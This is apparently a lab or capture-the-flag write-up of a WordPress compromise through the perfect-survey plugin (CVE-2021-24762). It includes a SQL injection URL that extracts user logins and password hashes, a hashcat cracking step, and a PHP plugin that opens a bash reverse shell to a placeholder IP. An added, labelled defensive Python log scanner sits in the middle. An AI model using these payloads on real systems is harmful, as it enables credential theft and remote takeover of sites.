WPScan

wpscan revealed that perfect-survey 1.5.1 was in use.

[Screenshot: wpscan output]

Exploit (CVE-2021-24762)

It was vulnerable to SQL injection. All I had to do was visit the URL below with the given payload to get users and passwords.

site.com/wp-admin/admin-ajax.php?action=get_question&question_id=1 union select 1,1,char(116,101,120,116),user_login,user_pass,0,0,null,null,null,null,null,null,null,null,null from wp_users

[Screenshot: exploit output]
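As an added, defensive example (not part of the original write-up): a small Python scanner that flags requests to the perfect-survey get_question endpoint whose question_id is not purely numeric, which catches the injected query above. The log lines are constructed and the combined Apache/nginx access-log format is assumed.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:12:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201,1,char(116,101,120,116),user_login,user_pass,0,0,null,null,null,null,null,null,null,null,null%20from%20wp_users HTTP/1.1" 200 2048 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:12:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=2%27%20or%201%3D1-- HTTP/1.1" 200 600 "-" "curl/7.88"
10.0.0.7 - - [10/Oct/2023:12:01:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, identity, user, [timestamp], "METHOD path proto", status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_suspicious_question_id(value: str) -> bool:
    """The plugin expects an integer id; any other content is a tamper attempt."""
    return not value.strip().isdigit()


def scan_log(text: str) -> list[dict]:
    """Return one record per get_question request carrying a non-numeric question_id."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        url = urlparse(m["path"])
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes each value once (e.g. %27 -> ', %20 -> space)
        qs = parse_qs(url.query, keep_blank_values=True)
        if qs.get("action") != ["get_question"]:
            continue
        for qid in qs.get("question_id", []):
            if is_suspicious_question_id(qid):
                hits.append({"ip": m["ip"], "ts": m["ts"],
                             "status": m["status"], "question_id": qid})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} question_id={hit["question_id"]!r}')
```

The same check (reject anything that is not an integer) is what the endpoint itself should do before the value reaches the query.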

Hashcat

I used hashcat with mode 400 and cracked it.

[Screenshot: cracked hash]

RCE

Then I was able to log in and get a reverse shell via a custom plugin upload.

<?php

/**
* Plugin Name: Wordpress Reverse Shell
* Author: mto

*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/22 0>&1'")
?>

[Screenshot: zip]

[Screenshot: test zip]

[Screenshot: gg]
